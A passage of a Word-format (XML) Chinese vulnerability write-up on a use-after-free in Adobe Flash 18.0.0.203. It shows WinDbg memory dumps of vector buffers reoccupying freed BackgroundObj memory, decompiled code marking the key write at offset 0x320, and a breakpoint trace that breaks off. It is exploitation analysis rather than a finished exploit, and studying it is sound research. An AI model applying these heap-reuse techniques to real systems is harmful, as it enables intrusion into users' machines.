    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>099541e0  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>099541f0  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>09954200  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>09954210  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>09954220  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E"/>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新分配的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内存布局</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D58D8" w:rsidRDefault="00B5145E" w:rsidP="002F4BD9">
      <w:r w:rsidRPr="00B5145E">
        <w:t>s -d 0x0 l?0x7fffffff 00000062 08d42000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>099541b0  00000062 08d42000 0000002e 00000000  b.... ..........</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>09954340  00000062 08d42000 0000002f 00000000  b.... ../.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>099544d0  00000062 08d42000 00000030 00000000  b.... ..0.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>09954660  00000062 08d42000 00000031 00000000  b.... ..1.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>099547f0  00000062 08d42000 00000032 00000000  b.... ..2.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>09954980  00000062 08d42000 00000033 00000000  b.... ..3.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>09954b10  00000062 08d42000 00000034 00000000  b.... ..4.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>09954ca0  00000062 08d42000 00000035 00000000  b.... ..5.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>09954e30  00000062 08d42000 00000036 00000000  b.... ..6.......</w:t>
      </w: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020  00000062 08d42000 00000037 00000000  b.... ..7.......</w:t>
      </w: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1b0  00000062 08d42000 00000038 00000000  b.... ..8.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00240211">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>0995c340  00000062 08d42000 00000039 00000000  b.... ..9.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C74BAD" w:rsidRPr="00240211" w:rsidRDefault="00C74BAD" w:rsidP="00B5145E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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4d0  00000062 08d42000 0000003a 00000000  b.... ..:.......</w:t>
      </w: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660  00000062 08d42000 0000003b 00000000  b.... ..;.......</w:t>
      </w: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7f0  00000062 08d42000 0000003c 00000000  b.... ..&lt;.......</w:t>
      </w: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980  00000062 08d42000 0000003d 00000000  b.... ..=.......</w:t>
      </w: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b10  00000062 08d42000 0000003e 00000000  b.... ..&gt;.......</w:t>
      </w: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ca0  00000062 08d42000 0000003f 00000000  b.... ..?.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRPr="00240211" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00240211">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>0995ce30  00000062 08d42000 00000040 00000000  b.... ..@.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0995e020  00000062 08d42000 00000041 00000000  b.... ..A.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0995e1b0  00000062 08d42000 00000042 00000000  b.... ..B.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0995e340  00000062 08d42000 00000043 00000000  b.... ..C.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0995e4d0  00000062 08d42000 00000044 00000000  b.... ..D.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0995e660  00000062 08d42000 00000045 00000000  b.... ..E.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0995e7f0  00000062 08d42000 00000046 00000000  b.... ..F.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0995e980  00000062 08d42000 00000047 00000000  b.... ..G.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0995eb10  00000062 08d42000 00000048 00000000  b.... ..H.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0995eca0  00000062 08d42000 00000049 00000000  b.... ..I.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0995ee30  00000062 08d42000 0000004a 00000000  b.... ..J.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0995f020  00000062 08d42000 0000004b 00000000  b.... ..K.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0995f1b0  00000062 08d42000 0000004c 00000000  b.... ..L.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0995f340  00000062 08d42000 0000004d 00000000  b.... ..M.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0995f4d0  00000062 08d42000 0000004e 00000000  b.... ..N.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0995f660  00000062 08d42000 0000004f 00000000  b.... ..O.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0995f7f0  00000062 08d42000 00000050 00000000  b.... ..P.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0995f980  00000062 08d42000 00000051 00000000  b.... ..Q.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0995fb10  00000062 08d42000 00000052 00000000  b.... ..R.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0995fca0  00000062 08d42000 00000053 00000000  b.... ..S.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0995fe30  00000062 08d42000 00000054 00000000  b.... ..T.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>09968020  00000062 08d42000 00000055 00000000  b.... ..U.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>099681b0  00000062 08d42000 00000056 00000000  b.... ..V.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>09968340  00000062 08d42000 00000057 00000000  b.... ..W.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>099684d0  00000062 08d42000 00000058 00000000  b.... ..X.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>09968660  00000062 08d42000 00000059 00000000  b.... ..Y.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>099687f0  00000062 08d42000 0000005a 00000000  b.... ..Z.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>09968980  00000062 08d42000 0000005b 00000000  b.... ..[.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>09968b10  00000062 08d42000 0000005c 00000000  b.... ..\.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>09968ca0  00000062 08d42000 0000005d 00000000  b.... ..].......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>09968e30  00000062 08d42000 0000005e 00000000  b.... ..^.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>09969020  00000062 08d42000 0000005f 00000000  b.... .._.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>099691b0  00000062 08d42000 00000060 00000000  b.... ..`.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>09969340  00000062 08d42000 00000061 00000000  b.... ..a.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>099694d0  00000062 08d42000 00000062 00000000  b.... ..b.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>09969660  00000062 08d42000 00000063 00000000  b.... ..c.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>099697f0  00000062 08d42000 00000064 00000000  b.... ..d.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>09969980  00000062 08d42000 00000065 00000000  b.... ..e.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>09969b10  00000062 08d42000 00000066 00000000  b.... ..f.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>09969ca0  00000062 08d42000 00000067 00000000  b.... ..g.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>09969e30  00000062 08d42000 00000068 00000000  b.... ..h.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0996a020  00000062 08d42000 00000069 00000000  b.... ..i.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0996a1b0  00000062 08d42000 0000006a 00000000  b.... ..j.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0996a340  00000062 08d42000 0000006b 00000000  b.... ..k.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0996a4d0  00000062 08d42000 0000006c 00000000  b.... ..l.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0996a660  00000062 08d42000 0000006d 00000000  b.... ..m.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0996a7f0  00000062 08d42000 0000006e 00000000  b.... ..n.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0996a980  00000062 08d42000 0000006f 00000000  b.... ..o.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0996ab10  00000062 08d42000 00000070 00000000  b.... ..p.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0996aca0  00000062 08d42000 00000071 00000000  b.... ..q.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0996ae30  00000062 08d42000 00000072 00000000  b.... ..r.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0996b020  00000062 08d42000 00000073 00000000  b.... ..s.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0996b1b0  00000062 08d42000 00000074 00000000  b.... ..t.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0996b340  00000062 08d42000 00000075 00000000  b.... ..u.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0996b4d0  00000062 08d42000 00000076 00000000  b.... ..v.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0996b660  00000062 08d42000 00000077 00000000  b.... ..w.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0996b7f0  00000062 08d42000 00000078 00000000  b.... ..x.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0996b980  00000062 08d42000 00000079 00000000  b.... ..y.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0996bb10  00000062 08d42000 0000007a 00000000  b.... ..z.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0996bca0  00000062 08d42000 0000007b 00000000  b.... ..{.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0996be30  00000062 08d42000 0000007c 00000000  b.... ..|.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D58D8" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0996c020  00000062 08d42000 0000007d 00000000  b.... ..}.......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00240211" w:rsidRDefault="00240211" w:rsidP="00B5145E"/>
    <w:p w:rsidR="00240211" w:rsidRDefault="00240211" w:rsidP="00B5145E"/>
    <w:p w:rsidR="00240211" w:rsidRDefault="00240211" w:rsidP="00B5145E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而之前释放的</w:t>
      </w:r>
      <w:r w:rsidR="0015073C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="0015073C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BackGroudObj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的地址，可以看到红色部分已经被分配的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vector buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新占用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00240211" w:rsidRPr="00BD7832" w:rsidRDefault="00240211" w:rsidP="00240211">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD7832">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>0995b810  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00240211" w:rsidRPr="00BD7832" w:rsidRDefault="00240211" w:rsidP="00240211">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD7832">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>0995bc08  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C74BAD" w:rsidRPr="00240211" w:rsidRDefault="00C74BAD" w:rsidP="00240211">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00240211" w:rsidRPr="00240211" w:rsidRDefault="00240211" w:rsidP="00240211">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00240211">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>0995c020  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00240211" w:rsidRPr="00240211" w:rsidRDefault="00240211" w:rsidP="00240211">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00240211">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>0995c418  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00240211" w:rsidRPr="00240211" w:rsidRDefault="00240211" w:rsidP="00240211">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00240211">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>0995c810  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00240211" w:rsidRDefault="00240211" w:rsidP="00240211">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0036524B" w:rsidRDefault="0036524B" w:rsidP="00240211"/>
    <w:p w:rsidR="00240211" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4 Recurisive return</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>随后</w:t>
      </w:r>
      <w:r w:rsidR="003F5CC0" w:rsidRPr="003F5CC0">
        <w:t>avmplus::AvmCore::integer</w:t>
      </w:r>
      <w:r w:rsidR="003F5CC0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>valueOf</w:t>
      </w:r>
      <w:r w:rsidR="003F5CC0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始返回到之前的</w:t>
      </w:r>
      <w:r w:rsidRPr="007E461F">
        <w:t>set_opaqueBackgroun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数中</w:t>
      </w:r>
      <w:r w:rsidR="00AD6A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00AD6A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后面对</w:t>
      </w:r>
      <w:r w:rsidR="00AD6A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BackgroundObj</w:t>
      </w:r>
      <w:r w:rsidR="00AD6A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行一些初始化</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6A55" w:rsidRDefault="00AD6A55" w:rsidP="0075603E"/>
    <w:p w:rsidR="00AD6A55" w:rsidRDefault="00AD6A55" w:rsidP="00AD6A55">
      <w:r>
        <w:t xml:space="preserve">      *(_DWORD *)(v5 + 0x30C) |= 4u;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6A55" w:rsidRDefault="00AD6A55" w:rsidP="00AD6A55">
      <w:r>
        <w:t xml:space="preserve">      *(_BYTE *)(sub_102B7B16(v2) + 0x860) = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6A55" w:rsidRDefault="00AD6A55" w:rsidP="00AD6A55">
      <w:r>
        <w:t xml:space="preserve">      *(_BYTE *)(v5 + 0x322) = v6 &gt;&gt; 16;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6A55" w:rsidRPr="00AD6A55" w:rsidRDefault="00AD6A55" w:rsidP="00AD6A55">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD6A55">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">      *(_BYTE *)(v5 + 0x320) = v6;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD6A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">  //KEY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="00AD6A55" w:rsidP="00AD6A55">
      <w:r>
        <w:t xml:space="preserve">      *(_BYTE *)(v5 + 0x321) = BYTE1(v6);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD6A55" w:rsidRPr="0075603E" w:rsidRDefault="00AD6A55" w:rsidP="00AD6A55"/>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>Breakpoint 6 hit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>eax=00000000 ebx=0000006a ecx=09957850 edx=00000006 esi=0995c810 edi=09951e50</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>eip=0778dd7e esp=038fe5a4 ebp=09957850 iopl=0         nv up ei pl zr na pe nc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00040246</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>Flash32_18_0_0_203!DllUnregisterServer+0x7489c:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>0778dd7e 889e20030000    mov     byte ptr [esi+320h],bl     ds:0023:0995cb30=00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>0:008&gt; g</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>Breakpoint 6 hit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
        <w:t>eax=00000000 ebx=0000006a ecx=09957850 edx=00000006 esi=0995c810 edi=09951e50</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="0075603E">
      <w:r>
